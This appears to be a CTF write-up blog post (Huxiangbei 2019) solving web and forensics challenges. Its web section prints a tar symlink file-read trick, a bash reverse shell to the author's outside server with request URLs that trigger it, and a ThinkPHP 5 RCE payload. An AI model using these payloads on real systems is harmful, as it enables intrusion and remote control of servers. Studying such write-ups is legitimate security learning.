湖湘杯2019部分Web+Misc

web

untar

直接访问题目可以看到源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<?php
$sandbox = "sandbox/" . md5($_SERVER["REMOTE_ADDR"]);
echo $sandbox."</br>";
@mkdir($sandbox);
@chdir($sandbox);
if (isset($_GET["url"]) && !preg_match('/^(http|https):\/\/.*/', $_GET["url"]))
die();
$url = str_replace("|", "", $_GET["url"]);
$data = shell_exec("GET " . escapeshellarg($url));
$info = pathinfo($_GET["filename"]);
$dir = str_replace(".", "", basename($info["dirname"]));
@mkdir($dir);
@chdir($dir);
@file_put_contents(basename($info["basename"]), $data);
shell_exec("UNTAR ".escapeshellarg(basename($info["basename"])));
highlight_file(__FILE__);

但是直接传马发现不解析,于是搜索了一下,发现 CVE-2018-12015: Archive::Tar: directory traversal

利用这个软连接可以来进行任意文件读取,具体poc如下:

1
2
3
4
ln -s /var/www/html/index.php content 
tar cvf exp.tar content
tar -tvvf exp.tar
php -S 0.0.0.0:2233
1
http://183.129.189.62:16407/?url=http://ezlovell.zeroyu.xyz:2233/exp.tar&filename=exp.tar

但是这个方法没有办法读取到flag

之后参考之前hitcon的ssrfme一题,发现可以在UNTAR处进行RCE,因此有了如下的exp:

1
服务器信息:202.182.115.203  2233

首先在服务器的z3文件中写入如下语句,方便后续执行进行反弹shell

1
bash -i >& /dev/tcp/202.182.115.203/2333 0<&1 2>&1

之后启动监听和一句话服务器,一句话服务器主要用于下载z3文件

1
php -S 0.0.0.0:2233   nc -lvp 2333

之后按照顺序执行下列语句即可获取反弹的shell

1
2
3
exp:  
http://183.129.189.62:16407/?url=http://202.182.115.203:2233/z3&filename=z3
http://183.129.189.62:16407/?url=http://202.182.115.203:2233/z3&filename=bash z3|

thinkphp?

做出来的唯一一道web题- -,平时接触RCE算比较多,刚好这题还是tp5的RCE,exp如下:

1
2
POST /
_method=__construct&filter[]=system&server[REQUEST_METHOD]=cat /flag

misc

Ezmemory

拿到一个raw为后缀的文件,刚开始百度查的时候还以为是图片啥的,后面才反应过来是linux的镜像文件。。

看大佬的write up用的是一款内存取证和分析工具–volatility,俺也没用过,贴上安全客上的wp;

volatility -f mem.raw imageinfo获取镜像系统信息

--profile=Win7SP1x64指定操作系统

volatility -f mem.raw --profile=Win7SP1x64 pslist列出所有进程

发现有一个cmd进程

volatility -f mem.raw --profile=Win7SP1x64 cmdscan查看命令行上的操作

得到flag。

Author: De-m0n
Link: http://De-m0n.github.io/2019/12/02/hxb2019/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.
Donate
  • 微信
  • 支付寶